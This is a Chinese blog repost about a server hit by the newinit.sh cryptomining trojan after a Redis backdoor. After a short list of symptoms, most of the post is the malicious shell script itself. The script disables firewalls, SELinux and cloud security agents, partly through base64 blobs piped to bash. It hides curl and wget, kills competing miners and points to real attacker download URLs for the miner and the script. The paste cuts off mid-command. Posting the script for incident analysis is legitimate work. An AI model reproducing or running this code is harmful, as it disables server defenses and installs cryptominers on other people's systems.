服务器遭到newinit.sh木马挖矿攻击记录
Posted 抛物线.
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了服务器遭到newinit.sh木马挖矿攻击记录相关的知识,希望对你有一定的参考价值。
服务器遭到newinit.sh木马攻击记录
一、中毒现象(Redis后门漏洞导致服务器被注入挖矿脚本解决)
- 服务器负载异常,具体表现load值冲高
- 服务器部分命令不可用,如top、ps、pstree、chattr等
- 重点是影响正在运行的业务
- 因为命令被篡改了,所以ps -ef是找不到的
二、贴出木马脚本 1000多行
#!/bin/sh
ulimit -n 65535
chmod 777 /usr/bin/chattr
chmod 777 /bin/chattr
chattr -iua /tmp/
chattr -iua /var/tmp/
iptables -F
ufw disable
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
chattr -iua /tmp/
chattr -iua /var/tmp/
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
rm -rf /var/log/syslog
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat $crondir`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/zzhs
rtdir="/etc/zzhs"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/wgettnt /usr/bin/wd1
mv /usr/bin/curltnt /usr/bin/cd1
mv /usr/bin/wget1 /usr/bin/wd1
mv /usr/bin/curl1 /usr/bin/cd1
mv /usr/bin/cur /usr/bin/cd1
mv /usr/bin/cdl /usr/bin/cd1
mv /usr/bin/cdt /usr/bin/cd1
mv /usr/bin/xget /usr/bin/wd1
mv /usr/bin/wge /usr/bin/wd1
mv /usr/bin/wdl /usr/bin/wd1
mv /usr/bin/wdt /usr/bin/wd1
mv /usr/bin/wget /usr/bin/wd1
mv /usr/bin/curl /usr/bin/cd1
if ps aux | grep -i '[a]liyun'; then
$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
echo 'IyEvYmluL2Jhc2gKCkFFR0lTX0lOU1RBTExfRElSPSIvdXNyL2xvY2FsL2FlZ2lzIgojY2hlY2sgbGludXggR2VudG9vIG9zIAp2YXI9YGxzYl9yZWxlYXNlIC1hIHwgZ3JlcCBHZW50b29gCmlmIFsgLXogIiR7dmFyfSIgXTsgdGhlbiAKCXZhcj1gY2F0IC9ldGMvaXNzdWUgfCBncmVwIEdlbnRvb2AKZmkKY2hlY2tDb3Jlb3M9YGNhdCAvZXRjL29zLXJlbGVhc2UgMj4vZGV2L251bGwgfCBncmVwIGNvcmVvc2AKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbGlmIFsgLWYgIi9ldGMvb3MtcmVsZWFzZSIgLWEgLW4gIiR7Y2hlY2tDb3Jlb3N9IiBdOyB0aGVuCglMSU5VWF9SRUxFQVNFPSJDT1JFT1MiCglBRUdJU19JTlNUQUxMX0RJUj0iL29wdC9hZWdpcyIKZWxzZSAKCUxJTlVYX1JFTEVBU0U9Ik9USEVSIgpmaQkJCgpzdG9wX2FlZ2lzX3BraWxsKCl7CiAgICBwa2lsbCAtOSBBbGlZdW5EdW4gPi9kZXYvbnVsbCAyPiYxCiAgICBwa2lsbCAtOSBBbGlIaWRzID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpSGlwcyA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaU5ldCA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaVNlY0d1YXJkID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpWXVuRHVuVXBkYXRlID4vZGV2L251bGwgMj4mMQogICAgCiAgICAvdXNyL2xvY2FsL2FlZ2lzL0FsaU5ldC9BbGlOZXQgLS1zdG9wZHJpdmVyCiAgICAvdXNyL2xvY2FsL2FlZ2lzL2FsaWhpcHMvQWxpSGlwcyAtLXN0b3Bkcml2ZXIKICAgIC91c3IvbG9jYWwvYWVnaXMvQWxpU2VjR3VhcmQvQWxpU2VjR3VhcmQgLS1zdG9wZHJpdmVyCiAgICBwcmludGYgIiUtNDBzICU0MHNcbiIgIlN0b3BwaW5nIGFlZ2lzIiAiWyAgT0sgIF0iCn0KCiMgY2FuIG5vdCByZW1vdmUgYWxsIGFlZ2lzIGZvbGRlciwgYmVjYXVzZSB0aGVyZSBpcyBiYWNrdXAgZmlsZSBpbiBnbG9iYWxjZmcKcmVtb3ZlX2FlZ2lzKCl7Cmtwcm9iZUFycj0oCiAgICAiL3N5cy9rZXJuZWwvZGVidWcvdHJhY2luZy9pbnN0YW5jZXMvYWVnaXNfZG9fc3lzX29wZW4vc2V0X2V2ZW50IgogICAgIi9zeXMva2VybmVsL2RlYnVnL3RyYWNpbmcvaW5zdGFuY2VzL2FlZ2lzX2luZXRfY3NrX2FjY2VwdC9zZXRfZXZlbnQiCiAgICAiL3N5cy9rZXJuZWwvZGVidWcvdHJhY2luZy9pbnN0YW5jZXMvYWVnaXNfdGNwX2Nvbm5lY3Qvc2V0X2V2ZW50IgogICAgIi9zeXMva2VybmVsL2RlYnVnL3RyYWNpbmcvaW5zdGFuY2VzL2FlZ2lzL3NldF9ldmVudCIKICAgICIvc3lzL2tlcm5lbC9kZWJ1Zy90cmFjaW5nL2luc3RhbmNlcy9hZWdpc18vc2V0X2V2ZW50IgogICAgIi9zeXMva2VybmVsL2RlYnVnL3RyYWNpbmcvaW5zdGFuY2VzL2FlZ2lzX2FjY2VwdC9zZXRfZXZlbnQiCiAgICAiL3N5cy9rZXJuZWwvZGVidWcvdHJhY2luZy9rcHJvYmVfZXZlbnRzIgogICAgIi91c3IvbG9jYWwvYWVnaXMvYWVnaXNfZGVidWcvdHJhY2luZy9zZXRfZXZlbnQiCiAgICAiL3Vzci9sb2NhbC9hZWdpcy9hZWdpc19kZWJ1Zy90cmFjaW5nL2twcm9iZV9ldmVudHMiCikKZm9yIHZhbHVlIGluICR7a3Byb2JlQXJyW0BdfQpkbwogICAgaWYgWyAtZiAiJHZhbHVlIiBdOyB0aGVuCiAgICAgICAgZWNobyA+ICR2YWx1ZQogICAgZmkKZG9uZQppZiBbIC1kICIke0FFR0lTX0lOU1RBTExfRElSfSIgXTt0aGVuCiAgICB1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vYWVnaXNfZGVidWcKICAgIGlmIFsgLWQgIiR7QUVHSVNfSU5TVEFMTF9ESVJ9L2Nncm91cC9jcHUiIF07dGhlbgogICAgICAgIHVtb3VudCAke0FFR0lTX0lOU1RBTExfRElSfS9jZ3JvdXAvY3B1CiAgICBmaQogICAgaWYgWyAtZCAiJHtBRUdJU19JTlNUQUxMX0RJUn0vY2dyb3VwIiBdO3RoZW4KICAgICAgICB1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vY2dyb3VwCiAgICBmaQogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX2NsaWVudAogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX3VwZGF0ZQoJcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FsaWhpZHMKICAgIHJtIC1yZiAke0FFR0lTX0lOU1RBTExfRElSfS9nbG9iYWxjZmcvZG9tYWluY2ZnLmluaQpmaQp9Cgp1bmluc3RhbGxfc2VydmljZSgpIHsKICAgCiAgIGlmIFsgLWYgIi9ldGMvaW5pdC5kL2FlZ2lzIiBdOyB0aGVuCgkJL2V0Yy9pbml0LmQvYWVnaXMgc3RvcCAgPi9kZXYvbnVsbCAyPiYxCgkJcm0gLWYgL2V0Yy9pbml0LmQvYWVnaXMgCiAgIGZpCgoJaWYgWyAkTElOVVhfUkVMRUFTRSA9ICJHRU5UT08iIF07IHRoZW4KCQlyYy11cGRhdGUgZGVsIGFlZ2lzIGRlZmF1bHQgMj4vZGV2L251bGwKCQlpZiBbIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiBdOyB0aGVuCgkJCXJtIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiA+L2Rldi9udWxsIDI+JjE7CgkJZmkKICAgIGVsaWYgWyAtZiAvZXRjL2luaXQuZC9hZWdpcyBdOyB0aGVuCiAgICAgICAgIC9ldGMvaW5pdC5kL2FlZ2lzICB1bmluc3RhbGwKCSAgICBmb3IgKCh2YXI9MjsgdmFyPD01OyB2YXIrKykpIGRvCgkJCWlmIFsgLWQgIi9ldGMvcmMke3Zhcn0uZC8iIF07dGhlbgoJCQkJIHJtIC1mICIvZXRjL3JjJHt2YXJ9LmQvUzgwYWVnaXMiCgkJICAgIGVsaWYgWyAtZCAiL2V0Yy9yYy5kL3JjJHt2YXJ9LmQiIF07dGhlbgoJCQkJcm0gLWYgIi9ldGMvcmMuZC9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCQlmaQoJCWRvbmUKICAgIGZpCgp9CgpzdG9wX2FlZ2lzX3BraWxsCnVuaW5zdGFsbF9zZXJ2aWNlCnJlbW92ZV9hZWdpcwp1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vYWVnaXNfZGVidWcKCgpwcmludGYgIiUtNDBzICU0MHNcbiIgIlVuaW5zdGFsbGluZyBhZWdpcyIgICJbICBPSyAgXSIKCgoK' | base64 -d | bash
echo 'IyEvYmluL2Jhc2gKCiNjaGVjayBsaW51eCBHZW50b28gb3MgCnZhcj1gbHNiX3JlbGVhc2UgLWEgfCBncmVwIEdlbnRvb2AKaWYgWyAteiAiJHt2YXJ9IiBdOyB0aGVuIAoJdmFyPWBjYXQgL2V0Yy9pc3N1ZSB8IGdyZXAgR2VudG9vYApmaQoKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbHNlCglMSU5VWF9SRUxFQVNFPSJPVEhFUiIKZmkKCnN0b3BfYWVnaXMoKXsKCWtpbGxhbGwgLTkgYWVnaXNfY2xpID4vZGV2L251bGwgMj4mMQoJa2lsbGFsbCAtOSBhZWdpc191cGRhdGUgPi9kZXYvbnVsbCAyPiYxCglraWxsYWxsIC05IGFlZ2lzX2NsaSA+L2Rldi9udWxsIDI+JjEKICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgYWVnaXMiICJbICBPSyAgXSIKfQoKc3RvcF9xdWFydHooKXsKCWtpbGxhbGwgLTkgYWVnaXNfcXVhcnR6ID4vZGV2L251bGwgMj4mMQogICAgICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgcXVhcnR6IiAiWyAgT0sgIF0iCn0KCnJlbW92ZV9hZWdpcygpewppZiBbIC1kIC91c3IvbG9jYWwvYWVnaXMgXTt0aGVuCiAgICBybSAtcmYgL3Vzci9sb2NhbC9hZWdpcy9hZWdpc19jbGllbnQKICAgIHJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3VwZGF0ZQpmaQp9CgpyZW1vdmVfcXVhcnR6KCl7CmlmIFsgLWQgL3Vzci9sb2NhbC9hZWdpcyBdO3RoZW4KCXJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3F1YXJ0egpmaQp9CgoKdW5pbnN0YWxsX3NlcnZpY2UoKSB7CiAgIAogICBpZiBbIC1mICIvZXRjL2luaXQuZC9hZWdpcyIgXTsgdGhlbgoJCS9ldGMvaW5pdC5kL2FlZ2lzIHN0b3AgID4vZGV2L251bGwgMj4mMQoJCXJtIC1mIC9ldGMvaW5pdC5kL2FlZ2lzIAogICBmaQoKCWlmIFsgJExJTlVYX1JFTEVBU0UgPSAiR0VOVE9PIiBdOyB0aGVuCgkJcmMtdXBkYXRlIGRlbCBhZWdpcyBkZWZhdWx0IDI+L2Rldi9udWxsCgkJaWYgWyAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgXTsgdGhlbgoJCQlybSAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgPi9kZXYvbnVsbCAyPiYxOwoJCWZpCiAgICBlbGlmIFsgLWYgL2V0Yy9pbml0LmQvYWVnaXMgXTsgdGhlbgogICAgICAgICAvZXRjL2luaXQuZC9hZWdpcyAgdW5pbnN0YWxsCgkgICAgZm9yICgodmFyPTI7IHZhcjw9NTsgdmFyKyspKSBkbwoJCQlpZiBbIC1kICIvZXRjL3JjJHt2YXJ9LmQvIiBdO3RoZW4KCQkJCSBybSAtZiAiL2V0Yy9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCSAgICBlbGlmIFsgLWQgIi9ldGMvcmMuZC9yYyR7dmFyfS5kIiBdO3RoZW4KCQkJCXJtIC1mICIvZXRjL3JjLmQvcmMke3Zhcn0uZC9TODBhZWdpcyIKCQkJZmkKCQlkb25lCiAgICBmaQoKfQoKc3RvcF9hZWdpcwpzdG9wX3F1YXJ0egp1bmluc3RhbGxfc2VydmljZQpyZW1vdmVfYWVnaXMKcmVtb3ZlX3F1YXJ0egoKcHJpbnRmICIlLTQwcyAlNDBzXG4iICJVbmluc3RhbGxpbmcgYWVnaXNfcXVhcnR6IiAgIlsgIE9LICBdIgoKCgo=' | base64 -d | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
export ARCH=amd64
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-$ARCH ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-$ARCH stop && /usr/local/cloudmonitor/CmsGoAgent.linux-$ARCH uninstall && rm -rf /usr/local/cloudmonitor
else
echo "ali cloud monitor not running"
fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aegis' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'edr' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'aegis' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'Yun' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'hids' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'edr' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'cloudwalker' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'titanagent' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'sgagent' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'barad_agent' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'hostguard' | awk 'print $2' | xargs -I kill -9
rm -rf /usr/local/aegis
miner_url="http://45.83.123.29/cleanfda/zzh"
miner_url_backup="http://en2an.top/cleanfda/zzh"
miner_size="2269048"
sh_url="http://45.83.123.29/cleanfda/newinit.sh"
sh_url_backup="http://en2an.top/cleanfda/newinit.sh"
chattr_size="8000"
sleep 1
if [ -x "$(command -v t)" ]; then
mv /usr/bin/t /usr/bin/chattr
fi
if [ -x "$(command -v chattr)" ]; then
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
fi
sleep 1
rm -f /tmp/.null 2>/dev/null
echo 128 > /proc/sys/vm/nr_hugepages
sysctl -w vm.nr_hugepages=128
kill_miner_proc()
netstat -anp | grep 194.87.139.103 | awk 'print $7' | awk -F'[/]' 'print $1' | xargs -I % kill -9 %
netstat -anp | grep 185.71.65.238 | awk 'print $7' | awk -F'[/]' 'print $1' | xargs -I % kill -9 %
netstat -anp | grep 140.82.52.87 | awk 'print $7' | awk -F'[/]' 'print $1' | xargs -I % kill -9 %
netstat -anp | grep :23 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :143 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :2222 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3333 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3389 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6666 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6665 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6667 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :7777 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :8444 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3347 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :10008 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
ps.original aux | grep -v grep | grep ':13531' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':3333' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':5555' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kworker -c\\' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'log_' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'systemten' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netns' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'voltuned' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'darwin' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/dl' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ddg' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/pprt' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ppol' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/65ccE*' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/jmx*' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '86s.jpg' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aGTSGJJp' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nMrfmnRa' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'PuNY5tm2' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep |以上是关于服务器遭到newinit.sh木马挖矿攻击记录的主要内容,如果未能解决你的问题,请参考以下文章
应急响应--记录一次漏洞紧急处理中意外发现的挖矿木马(Shiro反序列化漏洞和ddg挖矿木马)
Ghost博客系统官网被最新的SaltStack漏洞攻击并植入挖矿木马